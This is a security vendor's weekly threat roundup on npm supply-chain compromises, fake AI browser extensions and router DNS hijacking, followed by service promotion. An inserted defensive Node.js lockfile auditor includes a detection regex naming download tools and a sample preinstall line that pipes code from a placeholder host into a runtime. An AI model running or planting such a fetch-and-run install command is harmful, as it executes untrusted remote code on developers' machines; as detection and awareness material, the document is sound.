[Week 2 of May 2026] Top 4 Cyber Threats Targeting Japanese Companies | npm Supply Chain Attacks, Fake AI Extensions & DNS Hijacking
- 18 hours ago
- 5 min read

This Week's Security Threat Highlights
The latest cyber threats identified overseas, such as npm supply chain attacks, AI-exploiting malware, and DNS hijacking, are now spreading to Japanese companies. This week, we've highlighted four new threats that could impact Japanese businesses at multiple levels, from development environments to corporate networks. Supply chain attacks and breaches of cloud environments are particularly prominent.
Threat 1: Shai-Hulud | A multi-cloud supply chain attack targeting npm
In May 2026, a new variant of the self-replicating malware "Shai-Hulud" was detected in the npm ecosystem. Several major packages, including intercom-client@7.0.4 (over 360,000 weekly downloads), were compromised, and AWS, GCP, and Azure credentials were stolen. The attackers exploited the GitHub Actions OIDC pipeline to take over the CI/CD infrastructure, gaining a foothold for further supply chain attacks.
Relevance to Japanese Companies: Many npm packages used by Japanese development teams may be affected. Companies doing cloud-native development are particularly exposed to intrusion into production environments via stolen cloud credentials. Companies that use GitHub Actions or OIDC integration should urgently review permission settings and inventory unnecessary tokens.
Threat 2: Bitwarden CLI compromise | Developer malware targeting GitHub credentials
On April 22, 2026, the official CLI (@bitwarden/cli@2026.4.0) for the password management tool Bitwarden was compromised via npm. A malicious preinstall hook downloaded the Bun JavaScript runtime and executed 9.7MB of obfuscated credential-stealing malware. SSH keys, cloud credentials, GitHub tokens, and AI tool configurations (Claude, MCP server settings) were stolen. The stolen GitHub tokens are being exploited to inject malicious workflows into repositories.
Relevance to Japanese Companies: A single breach can endanger multiple layers, from developers' personal machines to a company's CI/CD pipeline. Development teams at Japanese SaaS companies and financial institutions are particularly vulnerable, and there are concerns about the compromise spreading to internal systems.
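As an added example (not code from the PIPELINE post or from either affected project), the following Node.js script audits a package-lock.json for the two compromised versions named above and flags dependencies that register install-time lifecycle scripts, the mechanism the Bitwarden CLI compromise used. The sample lockfile and the package names "example-helper" and "safe-lib" are constructed for illustration.

```javascript
// Known-compromised versions named in the post (Threats 1 and 2).
const COMPROMISED = {
  "intercom-client": new Set(["7.0.4"]),
  "@bitwarden/cli": new Set(["2026.4.0"]),
};

// Lockfile v2/v3 keys look like "node_modules/a/node_modules/@s/b";
// the package name (scope included) is the last segment.
function packageName(key) {
  const parts = key.split("node_modules/");
  return parts[parts.length - 1];
}

// Heuristic for lifecycle scripts that fetch and run code at install time
// (the Bitwarden case downloaded the Bun runtime and executed a payload).
const FETCH_AND_RUN = /\b(curl|wget|bun|node\s+-e|powershell|Invoke-WebRequest)\b/i;

// lock: parsed package-lock.json; nodeModulesScripts: map of package name ->
// "scripts" object read from node_modules/<name>/package.json, because the
// lockfile only records that an install script exists (hasInstallScript).
function auditLockfile(lock, nodeModulesScripts = {}) {
  const findings = [];
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    if (key === "") continue; // root project entry
    const name = packageName(key);
    if (COMPROMISED[name]?.has(entry.version)) {
      findings.push({ name, version: entry.version, reason: "known-compromised version" });
    }
    if (entry.hasInstallScript) {
      const scripts = nodeModulesScripts[name] || {};
      const body = ["preinstall", "install", "postinstall"]
        .map((k) => scripts[k]).filter(Boolean).join(" ; ");
      findings.push({
        name, version: entry.version,
        reason: FETCH_AND_RUN.test(body) ? "install script downloads and runs code"
                                          : "install-time script present",
      });
    }
  }
  return findings;
}

// Constructed sample input: one compromised version, one hypothetical
// package with a fetch-and-run preinstall script, one clean package.
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  "": { name: "internal-app" },
  "node_modules/intercom-client": { version: "7.0.4" },
  "node_modules/example-helper": { version: "1.2.3", hasInstallScript: true },
  "node_modules/safe-lib": { version: "0.1.0" },
} };
const SAMPLE_SCRIPTS = { "example-helper": { preinstall: "curl -fsSL https://example.invalid/stage | bun -" } };
const SAMPLE_FINDINGS = auditLockfile(SAMPLE_LOCK, SAMPLE_SCRIPTS);
for (const f of SAMPLE_FINDINGS) console.log(`${f.name}@${f.version}: ${f.reason}`);
```

On a real project, parse package-lock.json with JSON.parse and build the scripts map by reading each flagged package's package.json from node_modules.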
Threat 3: AiFrame | Fake AI Assistant Extension Infecting 260,000 People
The "AiFrame" campaign, a set of malicious browser extensions impersonating AI assistants such as ChatGPT, Claude, Gemini, and Grok, has been downloaded by over 260,000 users from the Chrome Web Store. These extensions use iframe injection to harvest authentication credentials and intercept user input. This poses a particularly high risk of confidential information leakage when corporate users run them during work.
Relevance to Japanese Companies: The use of AI tools by Japanese corporate users is also rapidly increasing, leading to a rise in the installation rate of fake extensions. In particular, there are concerns about eavesdropping on authentication information and confidential data when sales and planning departments input internal information into AI. Companies that allow employees to freely install Chrome extensions urgently need to review their browser usage policies.
Threat 4: Forest Blizzard | DNS hijacking attack exploiting home routers
APT28 (Forest Blizzard), affiliated with the Russian military intelligence agency GRU, is carrying out widespread DNS hijacking attacks on vulnerable home and small office (SOHO) routers. The attackers tamper with the routers' DNS settings, redirect users to fake websites, and capture authentication credentials such as Microsoft Office tokens in adversary-in-the-middle (AiTM) attacks.
Relevance to Japanese Companies: Employees of Japanese companies using home routers in teleworking environments may be targeted. In particular, there is a high risk of theft of access credentials to the corporate network through man-in-the-middle attacks during the DNS resolution phase before VPN connection.
Sources
1. Shai-Hulud Worm Pivots to Multi-Cloud: intercom-client@7.0.4 Hijacked
2. Bitwarden CLI Hijacked on npm: Bun-Staged Credential Stealer Targets Developers, GitHub Actions, and AI Tools
3. "AiFrame" - Fake AI Assistant Extensions Targeting 260,000 Chrome Users via injected iframes
4. SOHO router compromise leads to DNS hijacking and adversary-in-the-middle attacks (Forest Blizzard)
How PIPELINE Co., Ltd. can help you
Threat 1 & 2: Supply chain attacks and compromise of development environments
RiskSensor (External Risk Intelligence & Attack Surface Visualization): Real-time monitoring of vulnerabilities and compromise status in npm packages. Early detection of compromised packages such as Shai-Hulud and Bitwarden CLI, and visualization of their usage within the organization.
ThreatIDR (DNS-level threat blocking/malware/C2 communication blocking): Detects and blocks command-and-control communications from malware and from actors using stolen cloud credentials at the DNS level. Prevents lateral movement from development environments to production environments.
DatalaiQ (Threat Hunting, Log Analysis, Incident Investigation): In-depth analysis of CI/CD pipeline logs to detect traces of compromised package execution and eavesdropping on credentials. Supports rapid investigation and response in the event of an incident.
Threat 3: Credential eavesdropping via fake AI assistant extensions
RiskSensor: Detects malicious Chrome extension distribution sources and command & control servers through dark web monitoring. Visualizes extension usage within your organization and enables risk assessment.
ThreatIDR: Blocks access to C2 servers used by fake extensions at the DNS level. Detects and blocks credential exfiltration traffic generated via iframe injection.
DatalaiQ: Analyzes browser network logs to detect malicious iframe communications and credential leaks. Endpoint-side threat hunting identifies infected devices.
Threat 4: Man-in-the-middle attack via router DNS hijacking
RiskSensor: Monitors vulnerabilities and compromise status of routers used in teleworking environments. It detects the activity of state-sponsored attackers like Forest Blizzard using external intelligence.
ThreatIDR: Detects man-in-the-middle attacks carried out via DNS hijacking. It detects and blocks abnormal DNS responses and redirects to fake sites at the DNS level, preventing attacks during the DNS resolution phase before the VPN connection is established.
DatalaiQ: Analyzes network logs to detect credential theft and malicious traffic after DNS hijacking. It identifies abnormal communication patterns from teleworking terminals, enabling early detection of breaches.
Key points this time
To summarize these four threats, the following three points are crucial:
"Things you trust" become attack vectors.
What matters is "how it looks from the outside," not how it looks from within the company.
Monitoring that assumes intrusion is necessary.
In other words, we are entering an era where the premise is not just "protecting" but also "finding."
At PIPELINE, we support companies in strengthening their security systems by providing external risk visualization and continuous monitoring to address these changes.

✦ Finally
Thank you for reading this far.
We at PIPELINE Corporation are a group of experts specializing in cybersecurity and threat intelligence.
We face threats together with our customers on-site every day.
"Even if we have a specialized team within the company, we lack the resources," "We don't know where to start," and "We want to prepare realistically, assuming we will be attacked."
We receive many inquiries like this. Regardless of the size of the company, the current situation is that weak points in defenses are easily targeted.
Furthermore, trying to handle everything internally inevitably makes it easier for things to be overlooked.
That's why we focus on practical methods that are useful in the field, rather than idealistic theories, and propose a small-scale, easy-to-implement approach. Even "a small step within your capabilities" can make a big difference in safety.
If you have any concerns at all, please feel free to contact us. Let's work together to find the quickest way to strengthen your security.